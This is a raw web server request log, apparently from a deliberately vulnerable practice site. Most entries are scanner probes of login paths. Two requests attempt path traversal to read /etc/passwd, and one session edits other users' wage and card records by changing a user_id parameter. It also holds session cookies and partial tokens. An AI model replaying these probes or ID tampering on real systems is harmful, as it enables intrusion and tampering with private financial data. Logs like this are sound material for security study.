Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /login.html
URL: /login.html
Method: GET
[2026-03-21 20:43:53] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /login.htm
URL: /login.htm
Method: GET
[2026-03-21 20:43:52] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /cgi-bin/login.cgi
URL: /cgi-bin/login.cgi
Method: GET
[2026-03-21 20:43:52] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /+CSCOE+/logon.html
URL: /+CSCOE+/logon.html
Method: GET
[2026-03-21 20:43:51] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /index.html
URL: /index.html
Method: GET
[2026-03-21 20:43:47] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /admin/index.html
URL: /admin/index.html
Method: GET
[2026-03-21 20:43:46] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /manage/account/login
URL: /manage/account/login
Method: GET
[2026-03-21 20:43:46] === HTTP Request ===
[2026-03-21 20:43:45] Main page accessed - IP: 216.180.246.27:26628
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /
URL: /
Method: GET
[2026-03-21 20:43:45] === HTTP Request ===
[2026-03-21 19:44:32] Main page accessed - IP: 172.30.0.12:46468
===================
Accept: */*
User-Agent: visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 3.18.186.238
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46468
Path: /
URL: /
Method: GET
[2026-03-21 19:44:32] === HTTP Request ===
[2026-03-21 19:43:37] Main page accessed - IP: 172.30.0.12:46468
===================
X-Forwarded-For: 3.18.186.238
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Referer: http://admin.vulnberries.ru/
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46468
Path: /
URL: /
Method: GET
[2026-03-21 19:43:37] === HTTP Request ===
[2026-03-21 18:42:05] Main page accessed - IP: 198.235.24.95:55018
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept: */*
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.95:55018
Path: /
URL: /
Method: GET
[2026-03-21 18:42:05] === HTTP Request ===
===================
Sec-Gpc: 1
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Te: trailers
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Dnt: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:37036
Path: /favicon.ico/sellers.json
URL: /favicon.ico/sellers.json
Method: GET
[2026-03-21 18:05:15] === HTTP Request ===
===================
Cache-Control: no-cache
Dnt: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Te: trailers
Sec-Fetch-Mode: no-cors
Sec-Gpc: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: script
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:37030
Path: /favicon.ico/app-ads.txt
URL: /favicon.ico/app-ads.txt
Method: GET
[2026-03-21 18:05:15] === HTTP Request ===
===================
Sec-Gpc: 1
Cache-Control: no-cache
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Te: trailers
Sec-Fetch-Site: cross-site
Dnt: 1
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:37024
Path: /favicon.ico/ads.txt
URL: /favicon.ico/ads.txt
Method: GET
[2026-03-21 18:05:15] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Te: trailers
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Dnt: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Site: cross-site
Sec-Gpc: 1
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:37010
Path: /login/favicon.ico
URL: /login/favicon.ico
Method: GET
[2026-03-21 18:05:15] === HTTP Request ===
===================
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:59843
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-21 18:05:10] === HTTP Request ===
[2026-03-21 18:05:10] Login page accessed - IP: 151.115.99.176:59843
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:59843
Path: /login
URL: /login
Method: GET
[2026-03-21 18:05:10] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:58221
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-21 18:05:10] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:44023
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-21 18:05:10] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:59843
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-21 18:05:10] === HTTP Request ===
[2026-03-21 18:05:10] Main page accessed - IP: 151.115.99.176:59843
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:59843
Path: /
URL: /
Method: GET
[2026-03-21 18:05:10] === HTTP Request ===
[2026-03-21 18:05:09] Main page accessed - IP: 151.115.99.176:34160
===================
Accept: */*
User-Agent: curl/7.81.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 151.115.99.176:34160
Path: /
URL: /
Method: HEAD
[2026-03-21 18:05:09] === HTTP Request ===
[2026-03-21 18:04:58] Main page accessed - IP: 165.22.253.250:34162
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.22.253.250:34162
Path: /
URL: /
Method: GET
[2026-03-21 18:04:58] === HTTP Request ===
[2026-03-21 17:39:48] Main page accessed - IP: 165.245.182.247:34830
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.245.182.247:34830
Path: /
URL: /
Method: GET
[2026-03-21 17:39:48] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:55380
Path: /jars
URL: /jars
Method: GET
[2026-03-21 16:24:43] === HTTP Request ===
[2026-03-21 16:03:55] Main page accessed - IP: 178.128.214.41:41322
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.214.41:41322
Path: /
URL: /
Method: GET
[2026-03-21 16:03:55] === HTTP Request ===
[2026-03-21 15:52:37] Main page accessed - IP: 121.199.172.179:33528
===================
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.199.172.179:33528
Path: /
URL: /
Method: GET
[2026-03-21 15:52:37] === HTTP Request ===
[2026-03-21 15:41:57] Main page accessed - IP: 87.236.176.185:51609
===================
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.185:51609
Path: /
URL: /
Method: GET
[2026-03-21 15:41:57] === HTTP Request ===
[2026-03-21 15:20:10] Main page accessed - IP: 176.65.149.45:43084
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:43084
Path: /
URL: /
Method: GET
[2026-03-21 15:20:10] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:44520
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-21 14:54:37] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: www.baidu.com:443
RemoteAddr: 166.0.198.82:43432
Path:
URL: //www.baidu.com:443
Method: CONNECT
[2026-03-21 14:46:23] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: www.baidu.com:443
RemoteAddr: 166.0.198.82:43426
Path:
URL: //www.baidu.com:443
Method: CONNECT
[2026-03-21 14:46:22] === HTTP Request ===
[2026-03-21 13:20:14] Main page accessed - IP: 34.140.251.161:33604
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.140.251.161:33604
Path: /
URL: /
Method: GET
[2026-03-21 13:20:14] === HTTP Request ===
[2026-03-21 12:48:54] Main page accessed - IP: 89.110.97.157:58700
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:58700
Path: /
URL: /
Method: GET
[2026-03-21 12:48:54] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 183.81.169.235:24086
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-21 12:19:31] === HTTP Request ===
[2026-03-21 10:46:43] Main page accessed - IP: 34.140.251.161:50738
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.140.251.161:50738
Path: /
URL: /
Method: GET
[2026-03-21 10:46:43] === HTTP Request ===
===================
Sec-Fetch-Dest: image
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Mode: no-cors
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Sec-Gpc: 1
Priority: u=6
Cookie: auth=sess_1774028793844765616; user_id=1
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-21 10:28:26] === HTTP Request ===
[2026-03-21 10:28:26] Salary page accessed - IP: 172.30.0.12:52044
===================
Te: trailers
Sec-Fetch-Mode: cors
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1774028793844765616; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Priority: u=4
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Path: /salary
URL: /salary
Method: GET
[2026-03-21 10:28:26] === HTTP Request ===
[2026-03-21 10:28:26] Salary page accessed - IP: 172.30.0.12:52044
===================
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Gpc: 1
Priority: u=0, i
Cookie: auth=sess_1774028793844765616; user_id=1
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Path: /salary
URL: /salary
Method: GET
[2026-03-21 10:28:26] === HTTP Request ===
[2026-03-21 10:27:06] Salary page accessed - IP: 172.30.0.12:52044
===================
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Via: 2.0 Caddy
Te: trailers
Cookie: auth=sess_1774029942171781665; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Priority: u=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Path: /salary
URL: /salary
Method: GET
[2026-03-21 10:27:06] === HTTP Request ===
[2026-03-21 10:27:04] Salary page accessed - IP: 172.30.0.12:52044
===================
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1774028793844765616; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: empty
Priority: u=0
Via: 2.0 Caddy
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Path: /salary
URL: /salary
Method: GET
[2026-03-21 10:27:04] === HTTP Request ===
[2026-03-21 10:26:55] Cabinet page accessed - user_id: 20, IP: 172.30.0.12:52044
===================
X-Forwarded-Proto: https
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=0
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user=20
Path: /cabinet
URL: /cabinet?user=20
Method: GET
[2026-03-21 10:26:55] === HTTP Request ===
[2026-03-21 10:25:17] Update Financial Info - user_id: 19, card_number: 13213, card_holder: test test, expiry_date: 123, cvv: 123
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Via: 2.0 Caddy
Sec-Gpc: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774028793844765616; user_id=1
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Method: GET
[2026-03-21 10:25:17] === HTTP Request ===
[2026-03-21 10:24:40] Update Financial Info - user_id: 17, card_number: 13213, card_holder: test test, expiry_date: 123, cvv: 123
===================
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1774028793844765616; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Mode: cors
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Method: GET
[2026-03-21 10:24:40] === HTTP Request ===
[2026-03-21 10:24:24] Update Financial Info - user_id: 17, card_number: 13213, card_holder: test test, expiry_date: 123, cvv: 123
===================
Sec-Fetch-Site: same-origin
Priority: u=0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Cookie: auth=sess_1774028793844765616; user_id=1
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br
Te: trailers
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Method: GET
[2026-03-21 10:24:24] === HTTP Request ===
[2026-03-21 10:23:55] Update Financial Info - user_id: 17, card_number: 13213, card_holder: test test, expiry_date: 123, cvv: 123
===================
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Priority: u=0
Cookie: auth=sess_1774028793844765616; user_id=1
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Via: 2.0 Caddy
Te: trailers
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Method: GET
[2026-03-21 10:23:55] === HTTP Request ===
[2026-03-21 10:23:55] Update Financial Info - user_id: 17, card_number: 13213, card_holder: test test, expiry_date: 123, cvv: 123
===================
Te: trailers
Via: 2.0 Caddy
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1774028793844765616; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=13213&card_holder=test+test&expiry_date=123&cvv=123
Method: GET
[2026-03-21 10:23:55] === HTTP Request ===
[2026-03-21 10:23:42] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
X-Forwarded-Proto: https
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774028793844765616; user_id=1
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-21 10:23:42] === HTTP Request ===
[2026-03-21 10:23:42] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Te: trailers
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Gpc: 1
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774028793844765616; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-21 10:23:42] === HTTP Request ===
[2026-03-21 10:23:38] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:52044
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
